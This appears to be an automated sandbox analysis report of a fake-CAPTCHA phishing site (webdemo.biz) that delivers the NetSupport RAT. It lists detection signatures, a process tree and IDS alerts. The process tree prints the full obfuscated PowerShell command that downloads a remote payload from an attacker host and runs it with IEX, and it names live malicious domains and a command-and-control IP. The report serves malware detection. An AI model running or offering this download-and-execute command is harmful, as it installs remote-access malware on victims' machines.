Edit tour
Windows
Analysis Report
https://webdemo.biz/
Overview
Detection
NetSupport RAT, CAPTCHA Scam
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
AI detected phishing page
Detect drive by download via clipboard copy & paste
Sigma detected: Powershell drops NetSupport RAT client
Suricata IDS alerts for network traffic
Yara detected CAPTCHA Scam
Downloads files with wrong headers with respect to MIME Content-Type
Powershell drops PE file
Sigma detected: Suspicious MSHTA Child Process
Suspicious powershell command line found
Uses ipconfig to lookup or modify the Windows network settings
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Downloads executable code via HTTP
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTML page contains hidden javascript code
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara detected NetSupport remote tool
Classification
- System is w10x64_ra
- chrome.exe (PID: 5700 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --st art-maximi zed "about :blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4) - chrome.exe (PID: 7020 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --mojo-pla tform-chan nel-handle =2164 --fi eld-trial- handle=193 6,i,131691 1314444360 3828,12295 8987622079 64987,2621 44 --disab le-feature s=Optimiza tionGuideM odelDownlo ading,Opti mizationHi nts,Optimi zationHint sFetching, Optimizati onTargetPr ediction / prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
- chrome.exe (PID: 6680 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" "htt ps://webde mo.biz/" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
- svchost.exe (PID: 2848 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- mshta.exe (PID: 7940 cmdline:
"C:\Window s\system32 \mshta.exe " https:// webdemo.bi z/Ray-veri fy.html # ? ''Veri fy you are human - R ay Verific ation ID: 2537'' MD5: 0B4340ED812DC82CE636C00FA5C9BEF2) - powershell.exe (PID: 8036 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" $c1='%%(N% %ew-O%%%bj e%%%ct N%% %et.W%%%e' ; $c4='b%% Cl%%%%ie%% nt%%).%%%D %%%ow%nl%% o%%'; $c3= 'a%%dSt%%% %ri%%%%%n% %%g(''http s://thecop ycat.biz/o /o.png'')' ;$TC=($c1, $c4,$c3 -J oin '');$T C=$TC.repl ace('%','' );I`E`X $T C|I`E`X MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 8044 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - ipconfig.exe (PID: 1284 cmdline:
"C:\Window s\system32 \ipconfig. exe" /flus hdns MD5: 62F170FB07FDBB79CEB7147101406EB8) - cmd.exe (PID: 3428 cmdline:
"C:\Window s\system32 \cmd.exe" /c attrib +h C:\User s\user\App Data\Roami ng\HzYATQ MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - attrib.exe (PID: 5940 cmdline:
attrib +h C:\Users\u ser\AppDat a\Roaming\ HzYATQ MD5: 5037D8E6670EF1D89FB6AD435F12A9FD) - client32.exe (PID: 7688 cmdline:
"C:\Users\ user\AppDa ta\Roaming \HzYATQ\cl ient32.exe " MD5: EE75B57B9300AAB96530503BFAE8A2F2)
- cleanup
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security | ||
JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security | ||
JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security | ||
JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security | ||
JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security | ||
Click to see the 19 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security | ||
JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security | ||
JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security | ||
JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security | ||
JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security | ||
Click to see the 3 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_CAPTCHAScam | Yara detected CAPTCHA Scam | Joe Security |
System Summary |
---|
Source: | Author: Michael Haag: |
Source: | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): |
Source: | Author: frack113, Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Source: | Author: vburov: |
Remote Access Functionality |
---|
Source: | Author: Joe Security: |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-10-31T00:15:42.254947+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49737 | 166.1.160.211 | 80 | TCP |
2024-10-31T00:15:42.254947+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49737 | 166.1.160.211 | 80 | TCP |
2024-10-31T00:15:42.254947+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49737 | 166.1.160.211 | 80 | TCP |
2024-10-31T00:15:43.896654+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49737 | 166.1.160.211 | 80 | TCP |
2024-10-31T00:15:43.896654+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49737 | 166.1.160.211 | 80 | TCP |
2024-10-31T00:15:43.896654+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49737 | 166.1.160.211 | 80 | TCP |
2024-10-31T00:15:45.856988+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49737 | 166.1.160.211 | 80 | TCP |
2024-10-31T00:15:45.856988+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49737 | 166.1.160.211 | 80 | TCP |
2024-10-31T00:15:45.856988+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49737 | 166.1.160.211 | 80 | TCP |
2024-10-31T00:15:46.019053+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49737 | 166.1.160.211 | 80 | TCP |
2024-10-31T00:15:46.019053+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49737 | 166.1.160.211 | 80 | TCP |
2024-10-31T00:15:46.019053+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49737 | 166.1.160.211 | 80 | TCP |
2024-10-31T00:15:46.243368+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49737 | 166.1.160.211 | 80 | TCP |
2024-10-31T00:15:46.243368+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49737 | 166.1.160.211 | 80 | TCP |
2024-10-31T00:15:46.243368+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49737 | 166.1.160.211 | 80 | TCP |
2024-10-31T00:15:46.411456+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49737 | 166.1.160.211 | 80 | TCP |
2024-10-31T00:15:46.411456+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49737 | 166.1.160.211 | 80 | TCP |
2024-10-31T00:15:46.411456+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49737 | 166.1.160.211 | 80 | TCP |
2024-10-31T00:15:46.663800+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49737 | 166.1.160.211 | 80 | TCP |
2024-10-31T00:15:46.663800+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49737 | 166.1.160.211 | 80 | TCP |
2024-10-31T00:15:46.663800+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49737 | 166.1.160.211 | 80 | TCP |
2024-10-31T00:15:46.866278+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49737 | 166.1.160.211 | 80 | TCP |
2024-10-31T00:15:46.866278+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49737 | 166.1.160.211 | 80 | TCP |
2024-10-31T00:15:46.866278+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49737 | 166.1.160.211 | 80 | TCP |
2024-10-31T00:15:52.195934+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49737 | 166.1.160.211 | 80 | TCP |
2024-10-31T00:15:52.195934+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49737 | 166.1.160.211 | 80 | TCP |
2024-10-31T00:15:52.195934+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49737 | 166.1.160.211 | 80 | TCP |
2024-10-31T00:15:53.167434+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49739 | 166.1.160.211 | 80 | TCP |
2024-10-31T00:15:53.167434+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49739 | 166.1.160.211 | 80 | TCP |
2024-10-31T00:15:53.167434+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49739 | 166.1.160.211 | 80 | TCP |
2024-10-31T00:15:55.980864+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49740 | 166.1.160.211 | 80 | TCP |
2024-10-31T00:15:55.980864+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49740 | 166.1.160.211 | 80 | TCP |
2024-10-31T00:15:55.980864+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.16 | 49740 | 166.1.160.211 | 80 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-10-31T00:15:03.265705+0100 | 2827745 | 1 | Malware Command and Control Activity Detected | 192.168.2.16 | 49742 | 92.255.85.135 | 443 | TCP |
Click to jump to signature section
Show All Signature Results
Phishing |
---|
Source: | LLM: |
Source: | File source: |
Source: | HTTP Parser: |
Source: | HTTP Parser: | ||
Source: | HTTP Parser: |
Source: | File opened: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Source: | Memory has grown: |
Networking |
---|
Source: | Suricata IDS: |
Source: | Image file has PE prefix: |